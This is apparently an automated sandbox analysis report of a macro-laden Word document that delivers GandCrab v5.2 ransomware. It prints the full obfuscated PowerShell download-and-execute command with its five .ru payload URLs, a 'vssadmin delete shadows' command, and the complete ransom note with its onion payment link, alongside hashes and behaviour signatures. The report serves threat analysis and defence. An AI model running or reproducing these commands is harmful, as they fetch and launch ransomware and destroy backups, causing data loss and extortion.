Overview

overview

10

Static

static

8

dcf3c03887...b.docm

windows7_x64

10

dcf3c03887...b.docm

windows10-2004_x64

10

Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    21-05-2022 00:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm

  • Size

    78KB

  • MD5

    fe2d1caa2d52000efcd19ea1ea31d254

  • SHA1

    6496aa6a299bc606ee9d058bdf4f0d826a2e4541

  • SHA256

    dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb

  • SHA512

    592a3447aa75b48b578b9f6b08524482b16c701f152b2fc2c074e63a9be84f250b380913b172e44af1dffbb0e223b6f17b959ac342b417fcbccadb3272b51f2d

Score
10/10
gandcrabbackdoorransomwarespywarestealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe
exe.dropper

http://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe
exe.dropper

https://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe
exe.dropper

http://sndtgo.ru/word.exe
exe.dropper

http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe

Extracted

Path

C:\KXCSWK-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .KXCSWK The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/93c436487f0515a | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- 7ftDEgLb/ZS0lcmZbHM61KDJ6AOtD78KkA7absMgUXYxWLsC+5+UYF9xVmDq9NDJK5DSAu6VseDZRWnIKnQXQzua3LPyzokSUuglaqKXwabsGM4pXku5In6gtMQMqg7sgEh1XW1iPMFgiUj/s1LdWpJHdiPjMpn7rCZNO/A31mak0K8RefoREu3BxtlAsseHWfVIIKN0U4NnA3w0Ga7XDLlF3iOIB6ImYbF6Z/7MBN2mgBr2rZ2gU1R7jNx2WKAyu4W+5zlHFnKwMISBi1CwemOo6FrxnP+Z5F9bSR7OvDBsmLj7oYD6GBgpBqj3RSAVfvfE0yZSXyCRtLeJdNAOBndqqsY9R+a3NbHEmdOR2keAP9zy/fNgLOXjT6O6r1xW4eZxTzPJ1fbDL0900Pf6S0az7KAooTTFqp2BPDax4ihAudvoNloC6iuVzOm2qBpvZrwBrtsyqy8A1fqlVzmR7qt4AuwwgS+wbkyMb58futxQLWmjvriRwBniojOwKKWg042SWKX+6AkUvCyim4EdEqxE9yN6AIPhmtRLIEP1VUGFyeqMeJ1Z1lg/vORKezAEhnSVCrHrOtcUPBaV ---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/93c436487f0515a

Signatures

  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

    ransomwarebackdoorgandcrab
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 18 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2456
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:448
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3424
        • C:\windows\temp\229.exe
          "C:\windows\temp\229.exe"
          4⤵
          • Executes dropped EXE
          • Modifies extensions of user files
          • Checks computer location settings
          • Drops startup file
          • Enumerates connected drives
          • Sets desktop wallpaper using registry
          • Drops file in Program Files directory
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:1076
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
            5⤵
              PID:3100
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x4f4 0x4f8
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3876

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    Query Registry

    4
    T1012

    System Information Discovery

    5
    T1082

    Peripheral Device Discovery

    1
    T1120

    Lateral Movement

    Collection

    Data from Local System

    1
    T1005

    Exfiltration

    Command and Control

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
      Filesize

      162B

      MD5

      6b79b8a6efa3f47dbcadc9fdc69dc52d

      SHA1

      afe2b3e9ae5e84e7695f9b325d59f6a66c769576

      SHA256

      f6f3bc588a680613e90199955aead16cf4bd450cdba1c1cc7ab1d8de8d90210a

      SHA512

      184484a1fd9ddd1d704010c2fb897b2176d9371650e4eb2af432f58902007f9bea0f7eee9a8563c707bfee5200aaabd5538a44b7141d4e096a20ddf34c0a2d57

      Download Submit
    • C:\Windows\Temp\229.exe
      Filesize

      535KB

      MD5

      a76b7140cf6d5c4dc5e0ecff23fc2ce0

      SHA1

      b312fef877f8eae6ca473a969f30bc85d907f7e3

      SHA256

      3a23fe7b3f8fa4d22a18aafc9c3c52746a7142cd33f8ddaaa264cf475939b972

      SHA512

      6a74b01537acf60408072d60f6a7b87c3f0d04a96301a3c1a051552f2248377c457a2a83505a6761017a2680ffce0c33cd8b4fa99e75212e13cdebd0a2f322e1

      Download Submit
    • C:\windows\temp\229.exe
      Filesize

      535KB

      MD5

      a76b7140cf6d5c4dc5e0ecff23fc2ce0

      SHA1

      b312fef877f8eae6ca473a969f30bc85d907f7e3

      SHA256

      3a23fe7b3f8fa4d22a18aafc9c3c52746a7142cd33f8ddaaa264cf475939b972

      SHA512

      6a74b01537acf60408072d60f6a7b87c3f0d04a96301a3c1a051552f2248377c457a2a83505a6761017a2680ffce0c33cd8b4fa99e75212e13cdebd0a2f322e1

      Download Submit
    • memory/448-137-0x0000000000000000-mapping.dmp
      Download
    • memory/1076-146-0x0000000000400000-0x000000000048D000-memory.dmp
      Filesize

      564KB

      Download
    • memory/1076-145-0x00000000021F0000-0x0000000002210000-memory.dmp
      Filesize

      128KB

      Download
    • memory/1076-142-0x0000000000000000-mapping.dmp
      Download
    • memory/2456-134-0x00007FFD89370000-0x00007FFD89380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2456-139-0x0000017971280000-0x0000017971284000-memory.dmp
      Filesize

      16KB

      Download
    • memory/2456-136-0x00007FFD86CE0000-0x00007FFD86CF0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2456-135-0x00007FFD86CE0000-0x00007FFD86CF0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2456-130-0x00007FFD89370000-0x00007FFD89380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2456-133-0x00007FFD89370000-0x00007FFD89380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2456-132-0x00007FFD89370000-0x00007FFD89380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2456-131-0x00007FFD89370000-0x00007FFD89380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3100-148-0x0000000000000000-mapping.dmp
      Download
    • memory/3424-138-0x0000000000000000-mapping.dmp
      Download
    • memory/3424-140-0x000001D426190000-0x000001D4261B2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/3424-141-0x00007FFD9EA60000-0x00007FFD9F521000-memory.dmp
      Filesize

      10.8MB

      Download